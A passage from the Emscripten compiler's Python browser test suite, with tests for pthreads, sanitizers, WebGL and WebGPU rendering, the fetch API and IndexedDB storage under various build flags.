self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread/call_sync_on_main_thread.js')])
self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_sync_on_main_thread.js')])
self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_sync_on_main_thread.js'), '-s', 'EXPORTED_FUNCTIONS=_main,_malloc'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')], ['-O3']]:
self.btest_exit(test_file('pthread/test_pthread_global_data_initialization.c'), args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest_exit(test_file('pthread/test_pthread_global_data_initialization.c'), args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest_exit(test_file('pthread/test_pthread_clock_drift.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest_exit(test_file('pthread/test_pthread_utf8_funcs.cpp'), args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@also_with_wasm2js
@requires_threads
def test_pthread_wake_all(self):
self.btest_exit(test_file('pthread/test_futex_wake_all.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'INITIAL_MEMORY=64MB'])
# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest_exit(test_file('pthread/test_pthread_stack_bounds.cpp'), args=['-s', 'USE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest_exit(test_file('pthread/test_pthread_tls.cpp'), args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest_exit(test_file('pthread/test_pthread_tls_main.cpp'), args=['-s', 'USE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(test_file('core/test_safe_stack.c'), expected='abort:stack overflow', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'STACK_OVERFLOW_CHECK=2', '-s', 'TOTAL_STACK=64KB'])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(test_file('pthread/test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread/test_pthread_asan_use_after_free.js')])
@requires_threads
def test_pthread_asan_use_after_free_2(self):
# similiar to test_pthread_asan_use_after_free, but using a pool instead
# of proxy-to-pthread, and also the allocation happens on the pthread
# (which tests that it can use the offset converter to get the stack
# trace there)
self.btest(test_file('pthread/test_pthread_asan_use_after_free_2.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=1', '--pre-js', test_file('pthread/test_pthread_asan_use_after_free_2.js')])
@requires_threads
def test_pthread_exit_process(self):
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-s', 'EXIT_RUNTIME',
'-DEXIT_RUNTIME',
'-O0']
args += ['--pre-js', test_file('core/pthread/test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core/pthread/test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)
@requires_threads
def test_pthread_trap(self):
create_file('pre.js', '''
if (typeof window === 'object' && window) {
window.addEventListener('error', function(e) {
if (e.error && e.error.message.includes('unreachable'))
maybeReportResultToServer("expected exception caught");
else
maybeReportResultToServer("unexpected: " + e);
});
}''')
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'EXIT_RUNTIME',
'--profiling-funcs',
'--pre-js=pre.js']
self.btest(test_file('pthread/test_pthread_trap.c'), expected='expected exception caught', args=args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest_exit(test_file('core/test_em_asm_signatures.cpp'), assert_returncode=121, args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest_exit(test_file('core/test_em_asm_signatures.cpp'), assert_returncode=121, args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest_exit(test_file('core/test_main_thread_async_em_asm.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_file('page.html', read_file(test_file('browser/test_em_asm_blocking.html')))
self.compile_btest([test_file('browser/test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest_exit(test_file('test_sigalrm.c'), args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', test_file('canvas_style_proxy_shell.html'), '--pre-js', test_file('canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(test_file('canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(test_file('custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', test_file('custom_messages_proxy_shell.html'), '--post-js', test_file('custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
self.compile_btest([test_file('in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, returncode in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, returncode)
self.btest_exit('binaryen_async.c', assert_returncode=returncode, args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest_exit('binaryen_async.c', assert_returncode=1, args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
@parameterized({
'': ([],),
'asan': (['-fsanitize=address', '-s', 'INITIAL_MEMORY=128MB'],)
})
def test_manual_wasm_instantiate(self, args=[]):
self.compile_btest([test_file('manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js'] + args)
shutil.copyfile(test_file('manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_file('shell2.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
self.compile_btest([test_file('browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', Path('cdn/test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
@also_with_threads
def test_utf8_textdecoder(self):
self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', test_file('utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXPORTED_RUNTIME_METHODS=[UTF8ToString]'])
@also_with_threads
def test_utf16_textdecoder(self):
self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', test_file('utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXPORTED_RUNTIME_METHODS=[UTF16ToString,stringToUTF16,lengthBytesUTF16]'])
@also_with_threads
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
# pthread TextDecoder support is more complex due to
# https://github.com/whatwg/encoding/issues/172
# and therefore the expected code size win there is actually a loss
if '-pthread' not in self.emcc_args:
self.assertLess(td_without_fallback, just_fallback)
else:
self.assertGreater(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure=1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5787), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
@disabled('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest_exit('gl_only_in_pthread.cpp', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest_exit('webgl_draw_triangle.c', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# Also there is a known bug with Mac Intel baseInstance which can fail producing the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'OFFSCREEN_FRAMEBUFFER',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
@requires_graphics_hardware
def test_webgl_sample_query(self):
cmd = ['-s', 'MAX_WEBGL_VERSION=2', '-lGL']
self.btest_exit('webgl_sample_query.cpp', args=cmd)
@requires_graphics_hardware
def test_webgl_timer_query(self):
for args in [
# EXT query entrypoints on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION'],
# builtin query entrypoints on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2'],
# EXT query entrypoints on a WebGL 1.0 context while built for WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2'],
]:
cmd = args + ['-lGL']
self.btest_exit('webgl_timer_query.cpp', args=cmd)
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
for version in [[], ['-s', 'FULL_ES3'], ['-s', 'FULL_ES3']]:
args = ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest_exit('webgl_draw_triangle.c', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest_exit('test_webgl_no_auto_init_extensions.c', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# VAO path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION'],
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1']
self.btest_exit('webgl_offscreen_framebuffer_swap_with_bad_state.c', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest_exit('webgl_draw_triangle_with_uniform_color.c', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@parameterized({
'': ([False],),
'asyncify': ([True],),
})
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_in_proxied_pthread(self, asyncify):
cmd = ['-s', 'USE_PTHREADS', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'GL_DEBUG', '-s', 'PROXY_TO_PTHREAD']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest_exit('gl_in_proxy_pthread.cpp', args=cmd)
@parameterized({
'proxy': (['-sPROXY_TO_PTHREAD'],),
'': ([],),
})
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self, args):
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
cmd = args + args2 + args3 + ['-s', 'USE_PTHREADS', '-lGL', '-s', 'GL_DEBUG']
print(str(cmd))
self.btest_exit('resize_offscreencanvas_from_main_thread.cpp', args=cmd)
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-s', 'GL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest_exit('webgl2_simple_enable_extensions.c', args=cmd)
@requires_graphics_hardware
def test_webgpu_basic_rendering(self):
for args in [[], ['-s', 'ASSERTIONS', '--closure=1'], ['-s', 'MAIN_MODULE=1']]:
self.btest_exit('webgpu_basic_rendering.cpp', args=['-s', 'USE_WEBGPU'] + args)
def test_webgpu_get_device(self):
for args in [['-s', 'ASSERTIONS', '--closure=1']]:
self.btest_exit('webgpu_get_device.cpp', args=['-s', 'USE_WEBGPU'] + args)
# Tests the feature that shell html page can preallocate the typed array and place it
# to Module.buffer before loading the script page.
# In this build mode, the -s INITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this was is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest_exit('test_preallocated_heap.cpp', args=['-s', 'WASM=0', '-s', 'INITIAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', test_file('test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
@also_with_wasm2js
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest_exit('fetch/to_memory.cpp',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'])
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(test_file('gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest_exit('fetch/to_memory.cpp',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'] + arg)
@parameterized({
'': ([],),
'pthread_exit': (['-DDO_PTHREAD_EXIT'],),
})
@requires_threads
def test_fetch_from_thread(self, args):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/from_thread.cpp',
args=args + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
also_wasm2js=True)
@also_with_wasm2js
def test_fetch_to_indexdb(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/to_indexeddb.cpp',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'])
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
@also_with_wasm2js
def test_fetch_cached_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/cached_xhr.cpp',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'])
# Tests that response headers get set on emscripten_fetch_t values.
@also_with_wasm2js
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/response_headers.cpp', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
@also_with_wasm2js
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest_exit('fetch/stream_file.cpp',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'INITIAL_MEMORY=536870912'])
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_xhr.cpp', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, in append is implicitly understood.
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/example_synchronous_fetch.cpp', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/example_synchronous_fetch.cpp', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@also_with_wasm2js
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_xhr.cpp',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '--proxy-to-worker'])
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@no_wasm_backend("emscripten_fetch_wait uses an asm.js based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_fetch_in_main_thread.cpp', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_store(self):
self.btest_exit('fetch/idb_store.cpp', args=['-s', 'USE_PTHREADS', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_delete(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/idb_delete.cpp', args=['-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
ensure_dir('dirrey')
shutil.copyfile(test_file('asmfs/hello_file.txt'), Path('dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
